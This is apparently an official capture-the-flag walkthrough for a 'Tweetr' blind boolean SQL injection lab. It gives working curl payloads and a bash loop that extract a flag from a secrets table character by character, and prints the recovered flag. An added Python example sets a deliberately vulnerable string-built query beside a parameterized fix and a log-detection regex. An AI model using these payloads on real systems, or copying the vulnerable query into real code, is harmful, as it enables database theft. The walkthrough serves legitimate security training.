hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Tweetr

SQL Injection · Blind Boolean SQL Injection
Difficulty: Medium
Vuln class: Blind Boolean SQL Injection
Steps: 4
// Objective
Extract the flag from the hidden secrets table using blind boolean SQL injection against a username-check endpoint that returns only true or false.
// Tools required
curl, bash
// Step-by-step walkthrough
Step 1: Confirm the injection point
The /api/check endpoint accepts a username and returns {"found":true} or {"found":false}. Test for injection by sending a tautology and a contradiction and comparing the two responses.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d "{\"username\":\"admin' AND 1=1--\"}"
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d "{\"username\":\"admin' AND 1=2--\"}"
Output
{"found":true}
{"found":false}
The responses differ, which confirms the injection: the appended boolean expression is evaluated by the database rather than being treated as part of the username.
Step 2: Confirm the secrets table exists
Ask the database whether the secrets table has any rows.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d "{\"username\":\"' OR (SELECT count(*) FROM secrets)>0--\"}"
Output
{"found":true}
Step 3: Find the flag length
Binary-search the flag length: change the threshold in the comparison until the response flips from true to false.
Command / Input
curl -s -X POST http://localhost:$PORT/api/check -H 'Content-Type: application/json' -d "{\"username\":\"' OR length((SELECT flag FROM secrets LIMIT 1))>30--\"}"
Adjust the number until you narrow down the exact length.
Step 4: Extract each character with binary search
Use ascii(substr(...)) to binary search each character position. Automate with a bash loop.
Command / Input
# Outer loop walks the character positions; the inner loop tries each printable
# ASCII value (32-126) in turn and stops at the first one the server confirms.
for pos in $(seq 1 38); do
  for val in $(seq 32 126); do
    r=$(curl -s -X POST http://localhost:$PORT/api/check \
      -H 'Content-Type: application/json' \
      -d "{\"username\":\"' OR ascii(substr((SELECT flag FROM secrets LIMIT 1),$pos,1))=$val--\"}")
    if echo "$r" | grep -q 'true'; then
      # Print the matched byte: build an octal escape and let printf decode it.
      printf "\\$(printf '%03o' $val)"
      break
    fi
  done
done
echo
Output
HackrGG{bl1nd_sqli_tw33tr_3xtr4ct3d}
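The root cause behind all four steps is a username pasted into SQL text. The following added example (not part of the challenge or the walkthrough; the schema and flag value are constructed stand-ins) reproduces the vulnerable lookup beside its parameterized form, runs the probes from Steps 1 and 2 against both, and adds a coarse log-side heuristic for spotting such probes.

```python
import re
import sqlite3

# Constructed stand-in for the challenge database; the real Tweetr schema is not known.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT);
        INSERT INTO users VALUES ('admin'), ('alice');
        CREATE TABLE secrets (flag TEXT);
        INSERT INTO secrets VALUES ('HackrGG{constructed_placeholder}');
    """)
    return db

def check_vulnerable(db, username):
    # The defect the walkthrough exploits: the caller-controlled value becomes SQL text,
    # so "admin' AND 1=2--" is parsed as a WHERE clause, not compared as a username.
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None

def check_safe(db, username):
    # Hardened form: the value is bound as a parameter and is never parsed as SQL,
    # so every probe below is simply a username that does not exist.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None

def compare(username):
    # Same input through both handlers; the pair differs only when injection works.
    db = make_db()
    return {"vulnerable": check_vulnerable(db, username),
            "safe": check_safe(db, username)}

# Coarse detection heuristic for request logs: a quote followed by a boolean
# operator, a trailing SQL comment, or an embedded SELECT. Assumed pattern, not a
# substitute for parameterized queries.
SUSPECT = re.compile(r"'\s*(AND|OR)\b|--\s*$|\bSELECT\b", re.IGNORECASE)

def looks_like_probe(username):
    return bool(SUSPECT.search(username))

if __name__ == "__main__":
    probes = ["admin", "admin' AND 1=1--", "admin' AND 1=2--",
              "' OR (SELECT count(*) FROM secrets)>0--"]
    for p in probes:
        print(repr(p), compare(p), "flagged" if looks_like_probe(p) else "clean")
```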
// Flag
Flag value
HackrGG{bl1nd_sqli_tw33tr_3xtr4ct3d}
Extracted character by character from the secrets table using blind boolean injection.